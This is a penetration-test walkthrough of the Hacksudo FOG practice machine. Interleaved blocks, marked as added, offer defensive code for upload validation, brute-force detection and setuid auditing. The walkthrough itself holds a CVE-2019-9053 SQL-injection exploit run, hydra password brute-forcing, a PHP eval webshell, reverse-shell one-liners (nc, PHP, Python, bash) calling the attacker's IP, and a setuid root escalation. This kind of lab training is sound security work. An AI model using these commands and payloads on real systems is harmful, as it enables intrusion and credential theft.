nmap -sP 10.80.56.0/24
Attacker host: 10.80.56.101
Target: 10.80.56.156
nmap -p- 10.80.56.156
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
2049/tcp open nfs
3306/tcp open mysql
39693/tcp open unknown
46723/tcp open unknown
52037/tcp open unknown
60457/tcp open unknown
nmap -A -p 1-65535 10.80.56.156
PORT STATE SERVICE VERSION
21/tcp open ftp Pure-FTPd
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 62:ce:1b:7d:4e:24:0f:8a:c1:c9:ea:c4:1e:21:a7:f3 (RSA)
| 256 92:04:5a:0a:86:62:b3:ba:00:f3:82:6a:c9:8d:ae:6d (ECDSA)
|_ 256 74:c5:7c:9f:8d:06:ee:0c:54:5e:65:b2:30:42:98:49 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Hacksudo FOG
|_http-server-header: Apache/2.4.38 (Debian)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 48453/udp mountd
| 100005 1,2,3 52037/tcp mountd
| 100005 1,2,3 55199/tcp6 mountd
| 100005 1,2,3 60205/udp6 mountd
| 100021 1,3,4 33657/tcp6 nlockmgr
| 100021 1,3,4 39693/tcp nlockmgr
| 100021 1,3,4 43561/udp nlockmgr
| 100021 1,3,4 59770/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
443/tcp open http Apache httpd 2.4.38
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Hacksudo FOG
2049/tcp open nfs 3-4 (RPC #100003)
3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 90
| Capabilities flags: 63486
| Some Capabilities: DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsLoadDataLocal, Speaks41ProtocolOld, SupportsTransactions, ODBCClient, SupportsCompression, LongColumnFlag, InteractiveClient, Support41Auth, FoundRows, Speaks41ProtocolNew, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: (N2Kd7$N>*WW0's//>,]
|_ Auth Plugin Name: mysql_native_password
39693/tcp open nlockmgr 1-4 (RPC #100021)
46723/tcp open mountd 1-3 (RPC #100005)
52037/tcp open mountd 1-3 (RPC #100005)
60457/tcp open mountd 1-3 (RPC #100005)
# A different directory wordlist is needed here before the scan finds dict.txt
dirsearch -u http://10.80.56.156/
# Visiting it shows that it is a wordlist
http://10.80.56.156/dict.txt
wget http://10.80.56.156/dict.txt
# View the page source to find the tool hinted at by the author
view-source:http://10.80.56.156/index1.html
<!-- caesar-cipher ==? https://github.com/hacksudo/SoundStegno --!>
<!-- box author : hacksudo --!>
# The tool hides ciphertext inside a WAV file (audio steganography)
Hiddenwave is a python based program for simple audio steganography. You can hide your secret text messages in wave audio file. you can play this audio in any media player and secretly share your private message with any one.
# Visiting shows it runs a CMS; a site built on a framework like this should always be checked for known usable vulnerabilities
http://10.80.56.156/cms/
http://10.80.56.156/cms/login.php
# Get the SQL injection script specific to this CMS
searchsploit CMS made simple 2.2.5
searchsploit -m 46635.py
#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
# Converted the Python 2 syntax to Python 3 before running it
python 46635.py -u http://10.80.56.156/cms/
# Got the username and the hashed password; tried john and online MD5 lookups, neither worked
[+] Salt for password found: 21ca796356464b52
[+] Username found: hacksudo
[+] Email found: info@hacksudo.com
[+] Password found: cd658361db0ee541e7fc728aba5570d3
# With the username and the wordlist known, try brute-forcing SSH
hydra -l hacksudo -P dict.txt 10.80.56.156 ssh
# SSH failed; tried brute-forcing FTP, which succeeded
hydra -l hacksudo -P dict.txt 10.80.56.156 ftp
[21][ftp] host: 10.80.56.156 login: hacksudo password: hackme
# Log in and get the first flag
cat flag1.txt
great you done step 1
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
|___/
www.hacksudo.com
# There is also a mysterious zip file on the FTP server, but it is password-protected; try a wordlist attack
zip2john secr3tSteg.zip | tee hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
# Extraction succeeded, giving a WAV file
Password: feede
-rwxrwxrwx 1 root root 1573833 12月18日 23:24 secr3tSteg.zip
-rwxrwxrwx 1 root root 23 2021年 5月 6日 secr3t.txt
-rwxrwxrwx 1 root root 1965596 2021年 5月 6日 hacksudoSTEGNO.wav
# Using the WAV steganography tool found above, extract the hidden key
python ./SoundStegno-main/ExWave.py -f hacksudoSTEGNO.wav
Your Secret Message is: Shift by 3 # The hint points to a Caesar cipher with key 3
ABCDEFGHIJKLMNOPQRSTUVWXYZ
DEFGHIJKLMNOPQRSTUVWXYZABC
zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
# Decrypt to get the account credentials
key1 #3: wwww.localhost/fog Username=fog:password=hacksudoISRO
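The shift-by-3 decryption above, as an added example that is not part of the original writeup: a small Caesar decoder that reverses the alphabet shift with case preserved, plus a trial of all 25 keys with a crude scoring heuristic (the marker words are an assumption). It also makes the security point the hint only implies: a cipher with 25 usable keys can be exhausted instantly, so it offers no confidentiality for a password.

```python
# Added example (not from the original writeup): a Caesar-shift decoder for
# the ciphertext recovered from the WAV file above. Letters are shifted back
# by `shift` positions with case preserved; everything else passes through.
import string

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase

# Ciphertext exactly as extracted on the page (hint: "Shift by 3").
CIPHERTEXT = "zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR"


def caesar_decrypt(text: str, shift: int) -> str:
    """Undo a Caesar cipher that encrypted by shifting `shift` letters forward."""
    out = []
    for ch in text:
        if ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) - shift) % 26])
        elif ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) - shift) % 26])
        else:
            out.append(ch)  # digits, punctuation and spaces are not part of the cipher
    return "".join(out)


def caesar_encrypt(text: str, shift: int) -> str:
    """Inverse of caesar_decrypt, useful to confirm a recovered key."""
    return caesar_decrypt(text, -shift)


def all_shifts(text: str) -> dict:
    """Try every one of the 25 non-trivial keys; a Caesar cipher has no more."""
    return {k: caesar_decrypt(text, k) for k in range(1, 26)}


def likely_shift(text: str, markers=("password", "user", "flag", "http")) -> int:
    """Pick the shift whose candidate plaintext contains the most marker words.
    The marker list is an assumption; any plaintext-recognition test would do."""
    best_shift, best_score = 0, -1
    for k, candidate in all_shifts(text).items():
        lowered = candidate.lower()
        score = sum(lowered.count(m) for m in markers)
        if score > best_score:
            best_shift, best_score = k, score
    return best_shift


if __name__ == "__main__":
    k = likely_shift(CIPHERTEXT)
    print(f"shift {k}: {caesar_decrypt(CIPHERTEXT, k)}")
```

Running the block prints the shift-3 plaintext shown on the line above; `all_shifts` is what a reader would use when no hint is available.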
# After logging in, found a file upload feature and uploaded a webshell
a.phtml
<?php @eval($_POST['a'])?>
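The upload above succeeds because the application accepts a `.phtml` name that Apache hands to the PHP interpreter. As an added example that is not part of the original writeup or of the CMS on the box, here is the kind of server-side validation that would have refused it: an extension allowlist checked against every dotted segment of the name, a magic-byte check that the content matches the declared type, and a scan for an embedded PHP open tag. The allowlist, the executable-extension set and the helper name are assumptions.

```python
# Added example (not from the original writeup): server-side upload
# validation that rejects names and contents like the a.phtml webshell above.
# Hypothetical helper; the allowlist and extension set are assumptions.
import os

# Only these extensions are accepted, and only when the content starts with
# the matching magic bytes.
ALLOWED = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Anything a typical Apache/PHP setup may hand to an interpreter. Checked
# against every dotted segment so "shell.php.png" and "a.phtml" both fail.
EXECUTABLE = {
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "pht",
    "cgi", "pl", "sh", "htaccess",
}


def validate_upload(filename: str, content: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). Reject on the name first, then on content."""
    base = os.path.basename(filename)
    if base != filename or "\x00" in filename:
        return False, "path separators or NUL bytes in name"
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension or hidden file"
    if any(p in EXECUTABLE for p in parts[1:]):
        return False, "executable extension present"
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not in allowlist"
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match declared type"
    # Cheap polyglot check: a valid image never needs a PHP open tag.
    if b"<?php" in content:
        return False, "embedded PHP open tag"
    return True, "ok"


if __name__ == "__main__":
    for name, data in (
        ("a.phtml", b"<?php phpinfo(); ?>"),
        ("photo.png", ALLOWED["png"] + b"pixels"),
        ("shell.php.png", ALLOWED["png"] + b"pixels"),
    ):
        print(name, validate_upload(name, data))
```

Two further controls belong with this check but are outside the code: store uploads outside the web root (or on a path where script execution is disabled), and rename files to a server-generated name so the client never controls the extension at all.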
# Try nc
nc -lvvp 6666
# nc is not installed; an uploaded nc binary also lacked the needed libraries and failed to run
nc -e /bin/bash 10.80.56.101 6666
/bin/sh: 1: nc: not found
# Tried a PHP reverse shell, failed
php -r '$sock=fsockopen("10.80.56.101",6666); exec("/bin/sh -i <&3 >&3 2>&3");'
# Tried a Python reverse shell, failed
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.80.56.101",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
# Tried a bash reverse shell, failed
bash -c "bash -i >& /dev/tcp/10.80.56.101 6666>&1"
# Finally downloaded the shell script from https://pentestmonkey.net/tools/web-shells/php-reverse-shell
# Changed the IP and port, uploaded and visited it; the reverse shell succeeded
python3 -c "import pty;pty.spawn('/bin/bash')"
# Get the second flag
cat flag2.txt
you successfully crack web and got shell access!!!
_ _ _ _
___ ___ _ __ __ _ _ __ __ _| |_ _ _| | __ _| |_(_) ___ _ __
/ __/ _ \| '_ \ / _` | '__/ _` | __| | | | |/ _` | __| |/ _ \| '_ \
| (_| (_) | | | | (_| | | | (_| | |_| |_| | | (_| | |_| | (_) | | | |
\___\___/|_| |_|\__, |_| \__,_|\__|\__,_|_|\__,_|\__|_|\___/|_| |_|
step 2 done.
_ ____
___| |_ ___ _ __ |___ \
/ __| __/ _ \ '_ \ __) |
\__ \ || __/ |_) | / __/
|___/\__\___| .__/ |_____|
|_|
# Checked whether the SQL dump contains account data; it does not
cp fog_sql_1.5.9_20210508_120942.sql /var/www/html/a.sql
# Tried brute-forcing the isro user's password, succeeded
hydra -l isro -P /usr/share/wordlists/rockyou.txt 10.80.56.156 ssh
[22][ssh] host: 10.80.56.156 login: isro password: qwerty
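The hydra runs against SSH (here and earlier) and FTP above each leave a burst of failed logins followed by one success in the target's logs, and that pattern is what a defender watches for. As an added example that is not part of the original writeup, the detection below parses constructed sshd `auth.log` lines, raises one alert when a source address reaches a failure threshold inside a sliding window, and a second, more serious alert when a password login from that address succeeds right after the burst. The sample lines, the threshold of 5 and the 60-second window are all assumptions; the same logic applies to Pure-FTPd logs with a different line regex.

```python
# Added example (not from the original writeup): detection logic for the
# password-guessing seen against SSH and FTP above, run over constructed
# sshd log lines. Threshold and window are assumptions, not tuned values.
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in /var/log/auth.log style (year-less syslog timestamps).
SAMPLE_LOG = """\
May  6 12:00:01 fog sshd[2001]: Failed password for isro from 10.80.56.101 port 40001 ssh2
May  6 12:00:02 fog sshd[2002]: Failed password for isro from 10.80.56.101 port 40002 ssh2
May  6 12:00:02 fog sshd[2003]: Failed password for invalid user admin from 10.80.56.101 port 40003 ssh2
May  6 12:00:03 fog sshd[2004]: Failed password for isro from 10.80.56.101 port 40004 ssh2
May  6 12:00:04 fog sshd[2005]: Failed password for isro from 10.80.56.101 port 40005 ssh2
May  6 12:00:05 fog sshd[2006]: Accepted password for isro from 10.80.56.101 port 40006 ssh2
May  6 12:30:00 fog sshd[2100]: Failed password for isro from 10.80.56.50 port 50001 ssh2
May  6 12:45:00 fog sshd[2101]: Accepted publickey for isro from 10.80.56.50 port 50002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)


def parse_line(line, year=2021):
    """Turn one sshd auth line into a dict, or None if it is not a login event.
    Syslog lines carry no year, so the caller supplies one (assumed 2021 here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {
        "ts": ts,
        "ok": m["result"] == "Accepted",
        "user": m["user"],
        "ip": m["ip"],
        "method": m["method"],
    }


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Flag a source IP once it produces `threshold` failures inside `window_s`
    seconds, and separately flag a password success that follows such a burst:
    that second event means a guessed password actually worked."""
    failures = defaultdict(list)  # ip -> timestamps of recent failures
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        ip, ts = ev["ip"], ev["ts"]
        # keep only the failures that still fall inside the sliding window
        failures[ip] = [t for t in failures[ip] if (ts - t).total_seconds() <= window_s]
        if not ev["ok"]:
            failures[ip].append(ts)
            if len(failures[ip]) == threshold:
                alerts.append(("bruteforce", ip, ts))
        elif len(failures[ip]) >= threshold and ev["method"] == "password":
            alerts.append(("success_after_bruteforce", ip, ts, ev["user"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print(*alert)
```

The second address in the sample (one failure, then a public-key login fifteen minutes later) produces nothing, which is the behaviour wanted: a single typo should not page anyone. Fail2ban-style blocking acts on the first alert type; the second is the one worth an incident ticket, because it indicates the account is now compromised and its password must be rotated.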
cat user.txt
8b64d2451b7a8f3fd17390f88ea35917
# Found several executables in isro's home directory; use strings to see whether one sets a uid
strings fog | grep uid
# Ran the fog program and found it runs with root privileges
os.system("id")
uid=0(root) gid=1003(isro) groups=1003(isro)
# Privilege escalation succeeded
os.system("/bin/bash -i")
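The root-owned `fog` binary that hands out a root shell is the kind of file a periodic setuid audit is meant to catch before a low-privilege user does. As an added example that is not part of the original writeup, the function below walks a directory tree with `lstat` (so symlinks are not followed), collects every regular file with the setuid or setgid bit, and reports those missing from a known-good baseline. The baseline contents are an assumption, and the demo builds its own throwaway tree rather than scanning the real filesystem, so it runs anywhere without privileges.

```python
# Added example (not from the original writeup): audit a directory tree for
# setuid/setgid files and report any not in a known-good baseline. The fog
# binary above is exactly the kind of unexpected SUID file this surfaces.
# Baseline contents and the scanned path are assumptions.
import os
import stat
import tempfile

# Illustrative baseline; a real one is generated once on a clean install
# and stored off-box so a compromised host cannot rewrite it.
KNOWN_GOOD = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su"}


def find_setid_files(root):
    """Yield (path, mode, uid) for every regular file with SUID or SGID set.
    Uses lstat so symlinks are never followed into other trees."""
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; keep scanning
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                yield path, st.st_mode, st.st_uid


def unexpected_setid(root, baseline=KNOWN_GOOD):
    """Return setid files under root that the baseline does not list."""
    return sorted(p for p, _, _ in find_setid_files(root) if p not in baseline)


def demo():
    """Build a throwaway tree with one SUID file and one plain file, then audit it."""
    tmp = tempfile.mkdtemp()
    suid = os.path.join(tmp, "fog")          # constructed stand-in for the binary above
    plain = os.path.join(tmp, "notes.txt")
    for p in (suid, plain):
        with open(p, "w") as fh:
            fh.write("placeholder\n")
    os.chmod(suid, 0o4755)   # setuid bit on our own file; grants nothing extra
    os.chmod(plain, 0o644)
    return tmp, suid, unexpected_setid(tmp)


if __name__ == "__main__":
    _, _, found = demo()
    for p in found:
        print("unexpected setid file:", p)
```

In production the call is `unexpected_setid("/")` from a scheduled job, with the result diffed against the previous run; an entry appearing under a user's home directory, as here, is a high-confidence finding whatever its name.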
# Got the final flag; box complete.
cat root.txt
. .
.n . . n.
. .dP dP 9b 9b. .
4 qXb . dX Xb . dXp t
dX. 9Xb .dXb __ __ dXb. dXP .Xb
9XXb._ _.dXXXXb dXXXXbo. .odXXXXb dXXXXb._ _.dXXP
9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo. .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
`9XXXXXXXXXXXXXXXXXXXXX'~ ~`OOO8b d8OOO'~ ~`XXXXXXXXXXXXXXXXXXXXXP'
`9XXXXXXXXXXXP' `9XX' DIE `98v8P' HUMAN `XXP' `9XXXXXXXXXXXP'
~~~~~~~ 9X. .db|db. .XP ~~~~~~~
)b. .dbo.dP'`v'`9b.od
b. .dX(
,dXXXXXXXXXXXb dXXXXXXXXXXXb.
dXXXXXXXXXXXP' . `9XXXXXXXXXXXb
dXXXXXXXXXXXXb d|b dXXXXXXXXXXXXb
9XXb' `XXXXXb.dX|Xb.dXXXXX' `dXXP
`' 9XXXXXX( )XXXXXXP `'
XXXX X.`v'.X XXXX
XP^X'`b d'`X^XX
X. 9 ` ' P )X
`b ` ' d'
` '
great you rooted hacksudo Fog Box !!!
flag {4356a779ce18252fa1dd2d2b6ab56b19}
submit this flag at hacksudo discord https://discord.gg/vK4NRYt3
HACKSUDO_FOG target machine penetration record